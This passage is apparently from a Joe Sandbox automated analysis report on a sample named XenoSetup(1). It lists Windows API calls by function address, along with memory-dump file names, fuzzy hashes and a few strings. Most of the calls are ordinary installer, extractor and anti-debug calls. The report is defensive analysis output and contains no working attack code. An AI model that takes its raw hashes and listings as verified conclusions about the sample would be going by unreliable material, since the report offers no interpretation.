                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: ccbbf2b743fd8c98f4e312e2931ce4f7da93ac4e4d1e4f44cc2d04dcfd0064bb
                                                                                      • Instruction ID: d488b4f07fc338133a073180439fdbf2927b146207f0979a0585a78e769473ca
                                                                                      • Opcode Fuzzy Hash: ccbbf2b743fd8c98f4e312e2931ce4f7da93ac4e4d1e4f44cc2d04dcfd0064bb
                                                                                      • Instruction Fuzzy Hash: 03A012C25991057C310421011D02C3B010CC8C5F60334481DF502C407968481C002430
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00FFE51F
                                                                                        • Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
                                                                                        • Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 976dd53de3ef644715245624a2e449c68c175d351cb2dc3fa25359e37bbd6c45
                                                                                      • Instruction ID: d488b4f07fc338133a073180439fdbf2927b146207f0979a0585a78e769473ca
                                                                                      • Opcode Fuzzy Hash: 976dd53de3ef644715245624a2e449c68c175d351cb2dc3fa25359e37bbd6c45
                                                                                      • Instruction Fuzzy Hash: 03A012C25991057C310421011D02C3B010CC8C5F60334481DF502C407968481C002430
                                                                                      APIs
                                                                                      • SetEndOfFile.KERNELBASE(?,00FE903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00FE9F0C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: File
                                                                                      • String ID:
                                                                                      • API String ID: 749574446-0
                                                                                      • Opcode ID: 79e92d51bc0119c273019a090d30122a55795476112d23f947bfd07e03670282
                                                                                      • Instruction ID: dae0e1318ee3770b0ad13dd14ed754307c630a197455614ebf8874cbcc4b2ecc
                                                                                      • Opcode Fuzzy Hash: 79e92d51bc0119c273019a090d30122a55795476112d23f947bfd07e03670282
                                                                                      • Instruction Fuzzy Hash: 57A0223008000E8BCE222B30CA2800C3B20FB20BC030002E8B00BCF0A2CB2F880BCF00
                                                                                      APIs
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00FFAE72,C:\Users\user\Desktop,00000000,0102946A,00000006), ref: 00FFAC08
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID:
                                                                                      • API String ID: 1611563598-0
                                                                                      • Opcode ID: 061848741c2787ce65e30986a4840e6b23cad1ff87c78d9a02e64dfd192ff4f5
                                                                                      • Instruction ID: d26bbb137adcd570ea9c1e425e10cb4bcf35b4f65777b984460f01f2a1dfc0ba
                                                                                      • Opcode Fuzzy Hash: 061848741c2787ce65e30986a4840e6b23cad1ff87c78d9a02e64dfd192ff4f5
                                                                                      • Instruction Fuzzy Hash: A5A011302002008BCA000A328B0AA0EBAAABFA2B20F00C028A08088020CB3AC820AA00
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(000000FF,?,?,00FE95D6,?,?,?,?,?,01012641,000000FF), ref: 00FE963B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2962429428-0
                                                                                      • Opcode ID: 9c8136366c35718c2f155a63086eaa4cfe1124f2097347f527b2dac9774dc652
                                                                                      • Instruction ID: bb654ff95e3cf84d7d77bf6b46ffdda6baef03b05f00ccf1843406afdc801649
                                                                                      • Opcode Fuzzy Hash: 9c8136366c35718c2f155a63086eaa4cfe1124f2097347f527b2dac9774dc652
                                                                                      • Instruction Fuzzy Hash: 04F0E930885B959FDB308A21C45879277E87B12331F040B1FD0F2429E0D3B5658DAB50
                                                                                      APIs
                                                                                        • Part of subcall function 00FE1316: GetDlgItem.USER32(00000000,00003021), ref: 00FE135A
                                                                                        • Part of subcall function 00FE1316: SetWindowTextW.USER32(00000000,010135F4), ref: 00FE1370
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00FFC2B1
                                                                                      • EndDialog.USER32(?,00000006), ref: 00FFC2C4
                                                                                      • GetDlgItem.USER32(?,0000006C), ref: 00FFC2E0
                                                                                      • SetFocus.USER32(00000000), ref: 00FFC2E7
                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00FFC321
                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00FFC358
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00FFC36E
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FFC38C
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFC39C
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FFC3B8
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FFC3D4
                                                                                      • _swprintf.LIBCMT ref: 00FFC404
                                                                                        • Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5
                                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00FFC417
                                                                                      • FindClose.KERNEL32(00000000), ref: 00FFC41E
                                                                                      • _swprintf.LIBCMT ref: 00FFC477
                                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00FFC48A
                                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00FFC4A7
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00FFC4C7
                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FFC4D7
                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00FFC4F1
                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00FFC509
                                                                                      • _swprintf.LIBCMT ref: 00FFC535
                                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00FFC548
                                                                                      • _swprintf.LIBCMT ref: 00FFC59C
                                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00FFC5AF
                                                                                        • Part of subcall function 00FFAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FFAF35
                                                                                        • Part of subcall function 00FFAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0101E72C,?,?), ref: 00FFAF84
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                      • API String ID: 797121971-1840816070
                                                                                      • Opcode ID: 8df0c3423e8156a8d4782bc70266b729e03ed661ac9996014951c8e9b1d5bff7
                                                                                      • Instruction ID: db0d5b6a5ba5a19590fdddb63d8dc3eb93f38d466dc9f49ac0d2517d1b3d38c0
                                                                                      • Opcode Fuzzy Hash: 8df0c3423e8156a8d4782bc70266b729e03ed661ac9996014951c8e9b1d5bff7
                                                                                      • Instruction Fuzzy Hash: E491A2B254835CBBD231DAA0CD89FFB77ACEF49710F044819B789DA091D73AA6049762
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00FE6FAA
                                                                                      • _wcslen.LIBCMT ref: 00FE7013
                                                                                      • _wcslen.LIBCMT ref: 00FE7084
                                                                                        • Part of subcall function 00FE7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00FE7AAB
                                                                                        • Part of subcall function 00FE7A9C: GetLastError.KERNEL32 ref: 00FE7AF1
                                                                                        • Part of subcall function 00FE7A9C: CloseHandle.KERNEL32(?), ref: 00FE7B00
                                                                                        • Part of subcall function 00FEA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00FE977F,?,?,00FE95CF,?,?,?,?,?,01012641,000000FF), ref: 00FEA1F1
                                                                                        • Part of subcall function 00FEA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00FE977F,?,?,00FE95CF,?,?,?,?,?,01012641), ref: 00FEA21F
                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00FE7139
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FE7155
                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00FE7298
                                                                                        • Part of subcall function 00FE9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FE73BC,?,?,?,00000000), ref: 00FE9DBC
                                                                                        • Part of subcall function 00FE9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00FE9E70
                                                                                        • Part of subcall function 00FE9620: CloseHandle.KERNELBASE(000000FF,?,?,00FE95D6,?,?,?,?,?,01012641,000000FF), ref: 00FE963B
                                                                                        • Part of subcall function 00FEA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA501
                                                                                        • Part of subcall function 00FEA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00FEA325,?,?,?,00FEA175,?,00000001,00000000,?,?), ref: 00FEA532
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                      • API String ID: 3983180755-3508440684
                                                                                      • Opcode ID: ed8735efaddf032c9186981a508a5e2ff57ecae2ebba581bdac2daffc024cb66
                                                                                      • Instruction ID: 2e0b9c831c2f81f25d1532412d94c8653bcb312d41a64d89fe5e228f5ec1a0bf
                                                                                      • Opcode Fuzzy Hash: ed8735efaddf032c9186981a508a5e2ff57ecae2ebba581bdac2daffc024cb66
                                                                                      • Instruction Fuzzy Hash: 74C10771D04384AEDB21EB75DC41FEEB7A8BF04310F004559FA96E7182D778AA44EB61
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00FFF844
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00FFF910
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFF930
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00FFF93A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: d263e0e109f6a0e04a57d0a6b3a9788ba8f4e774b17a96d0ab17008f5b94bb91
                                                                                      • Instruction ID: 3384522fa100f920dc3a3a5ecfdca53c606ad03b5a3d6952377dae418f5a44da
                                                                                      • Opcode Fuzzy Hash: d263e0e109f6a0e04a57d0a6b3a9788ba8f4e774b17a96d0ab17008f5b94bb91
                                                                                      • Instruction Fuzzy Hash: 7B312B75D4521D9BDF20DFA4D9897CCBBB8BF04304F1041AAE50CAB290EB759A889F44
                                                                                      APIs
                                                                                      • VirtualQuery.KERNEL32(80000000,00FFE5E8,0000001C,00FFE7DD,00000000,?,?,?,?,?,?,?,00FFE5E8,00000004,01041CEC,00FFE86D), ref: 00FFE6B4
                                                                                      • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00FFE5E8,00000004,01041CEC,00FFE86D), ref: 00FFE6CF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoQuerySystemVirtual
                                                                                      • String ID: D
                                                                                      • API String ID: 401686933-2746444292
                                                                                      • Opcode ID: cf2ad254153944c441b6e9372e831acd254adaa68063967406dd812220bcdec6
                                                                                      • Instruction ID: c01b9f0daa50ecf9779bd95db92a93b3ec204eeb65d61f920a9f6c45d114819f
                                                                                      • Opcode Fuzzy Hash: cf2ad254153944c441b6e9372e831acd254adaa68063967406dd812220bcdec6
                                                                                      • Instruction Fuzzy Hash: 50018473A4010D6BDB24DE29DC49AED7BBAAFC4334F0CC124EE59DA264D738D9058690
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 01008FB5
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 01008FBF
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 01008FCC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: 4a07da2a25f6656f52942b58b5a4f9a2b5eb77608b5ae8c98f04f0df0537183a
                                                                                      • Instruction ID: f23a59f8a5bb14d904ca1c24764d057b74b6651c04c635fa228e8e605465e6c3
                                                                                      • Opcode Fuzzy Hash: 4a07da2a25f6656f52942b58b5a4f9a2b5eb77608b5ae8c98f04f0df0537183a
                                                                                      • Instruction Fuzzy Hash: 4531D87494121C9BCB21DF28DC8879CBBB8BF08310F5042EAE51CA72A0E7749B858F44
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .
                                                                                      • API String ID: 0-248832578
                                                                                      • Opcode ID: 31a7226bb83eb6003552d4c96856885b6d0e07000366c5718e4e536e4443548f
                                                                                      • Instruction ID: 0bfd3c2d0fa0cdfca4e4ff57b18c659df6c38bcbd5d75ff6a72ad45907ebcd5d
                                                                                      • Opcode Fuzzy Hash: 31a7226bb83eb6003552d4c96856885b6d0e07000366c5718e4e536e4443548f
                                                                                      • Instruction Fuzzy Hash: 32314B758002496FEB26DE78CC84EFB7BFDDF85314F1441A8F998D7282EA349A448B50
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00FFAF35
                                                                                      • GetNumberFormatW.KERNEL32(00000400,00000000,?,0101E72C,?,?), ref: 00FFAF84
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: FormatInfoLocaleNumber
                                                                                      • String ID:
                                                                                      • API String ID: 2169056816-0
                                                                                      • Opcode ID: cd345ae55922788e58c788ffdb60e7a55f6c1b528071bd99e67d9d2984732b83
                                                                                      • Instruction ID: 9dd4a484d44b5a35906d266a46332cf88e26e18102df1b0088b3833496aafd64
                                                                                      • Opcode Fuzzy Hash: cd345ae55922788e58c788ffdb60e7a55f6c1b528071bd99e67d9d2984732b83
                                                                                      • Instruction Fuzzy Hash: 53017C7A550309AAD7219FA5EC46F9A77BCFF08710F004022FB45AB194E379A914CBA5
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00FE6DDF,00000000,00000400), ref: 00FE6C74
                                                                                      • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00FE6C95
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFormatLastMessage
                                                                                      • String ID:
                                                                                      • API String ID: 3479602957-0
                                                                                      • Opcode ID: 7d82890af6e37803ca69afeb0a2acda7c92339e806d6dfbca8e9519285f3ea43
                                                                                      • Instruction ID: 22f8f0c41f82acb99d74028a6f1700a7ec1cded6aeb2be821e529b474c5b8d3b
                                                                                      • Opcode Fuzzy Hash: 7d82890af6e37803ca69afeb0a2acda7c92339e806d6dfbca8e9519285f3ea43
                                                                                      • Instruction Fuzzy Hash: AAD0C731344300BFFA150A625D06F1A7B99BF55BE2F24C4047795D80D0C6799414B715
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FFF66A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true
                                                                                      • Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd
                                                                                      Similarity
